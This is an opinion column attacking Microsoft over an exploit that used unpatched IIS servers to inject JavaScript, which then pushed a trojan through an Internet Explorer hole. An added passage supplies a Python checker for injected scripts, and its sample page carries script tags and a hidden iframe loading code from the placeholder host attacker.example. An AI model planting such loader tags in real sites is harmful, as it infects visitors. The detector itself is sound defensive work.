Note: This column represents the opinions
of the writer and as such, is not purported as fact
It's pretty easy to poke sticks at Microsoft's sorry record in the area
of online security -- but to be fair, that's not surprising when you realise
how large a target they are and how many evil little sods are burning the
midnight oil trying to exploit the smallest hole in Windows or IE.
However, I find it impossible to defend Microsoft in any way after the
events of this past weekend.
As documented by any number of stories on the wires (the MSNBC story
I've linked to in the news section below provides a good summary), it
seems that a cracker or group of crackers launched what must have been
the most undodgable MS-specific exploit to date.
Indeed, as a result of this exploit, the average web-surfer was completely
vulnerable to having their PC hijacked and loaded up with malware. All they
had to do was connect to the Net and surf to the wrong website. And here's
the kicker -- that "wrong website" need not be some obscure cracker's page
with the name "i0wnUd00d.asp" -- in fact it could have been the pages
of any number of highly respectable and otherwise trustworthy websites.
Normally it's pretty easy for Microsoft to roll out the defence that it's
only users of unpatched software who are vulnerable to any particular
attack -- but not in this case.
That's because the exploit relies on at least one unpatched vulnerability in
the company's Internet Explorer browser -- a vulnerability that has been
known about for some time but was seemingly ignored by the update team.
What the crackers did was to identify an unknown number of websites running
unpatched versions of IIS and then exploit a known vulnerability to
add code which embedded some JavaScript into each page those servers dished
up.
That JavaScript contained code that subsequently exploited the unpatched vulnerability in
IE to automatically load a trojan from a Russian cracker's website. That
trojan effectively gave the cracker access to the PC for the purposes of
keylogging, spam relaying or whatever.
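The column describes the pattern rather than giving site owners a way to spot it, so here is an added example (not code from the column or from Microsoft) of the kind of check a webmaster could run over their own served pages: it flags script tags appended after the closing html tag, and script sources on hosts outside an allowlist. The sample page and the host name attacker.example are constructed placeholders, not indicators from the incident.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a page as a compromised server might serve it:
# the site's own markup, followed by a script block the site owner
# never wrote. attacker.example is a placeholder host, not a real IoC.
SAMPLE_PAGE = """<html><head><title>News</title>
<script src="/js/site.js"></script></head>
<body><p>Daily column</p></body></html>
<script src="http://attacker.example/loader.js"></script>
<script>document.write('<iframe src="http://attacker.example/x.html" width=0 height=0>')</script>
"""

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
END_RE = re.compile(r"</html\s*>", re.I)


def find_injected_scripts(html, trusted_hosts):
    """Return a list of (reason, snippet) findings for one served page.

    Two cheap checks a site owner can run over a crawl of their own site:
    1. script tags that appear after the closing </html> tag, which is
       where a server-side footer injection typically lands;
    2. script src= URLs that point at hosts outside the allowlist.
    Relative URLs (the site's own scripts) have no host and are not flagged.
    """
    findings = []
    ends = list(END_RE.finditer(html))
    end = ends[-1].start() if ends else -1
    for m in SCRIPT_RE.finditer(html):
        attrs = m.group(1)
        snippet = m.group(0)[:80]
        if end != -1 and m.start() > end:
            findings.append(("script after </html>", snippet))
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname
            if host and host.lower() not in trusted_hosts:
                findings.append(("external script host: " + host, snippet))
    return findings


if __name__ == "__main__":
    for reason, snippet in find_injected_scripts(SAMPLE_PAGE, {"www.example.com"}):
        print(reason, "|", snippet)
```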
By knocking out the cracker's website, the threat posed by this particular
villain has been defused but as we all know, there are probably dozens of
other crackers out there right now already doing the same thing.
So why haven't Microsoft patched this IE vulnerability and what are they
doing about it?
Well it seems that their sole response has been to refer users to
this page.
I'm sorry, but this is kind of like Mitsubishi advising that the brakes could
completely fail without warning on their fastest sports sedans and then suggesting
that the fix is for people not to drive too fast in the meantime.
And, as we all know, this won't be the last such vulnerability to appear in
IE which, when compared to other offerings such as Opera and Mozilla/Firefox
is rapidly showing its age.
I strongly suggest (again) therefore, that people wake up to the fact that
using IE is the cyber-equivalent of taping a "kick me" sign to their backsides.
If the feature benefits alone aren't enough to convince you to switch then
stop and remember that right now you, your mother, your girlfriend and
all your loved ones who might be using IE may be just a mouse-click away
from the next implementation of this exploit.
Do yourself and them a favour -- get off the IE bandwagon now!
When the LTSA discovered that some Mitsis might suffer a total brake failure
they ordered them off the road -- is it time to order IE off the web?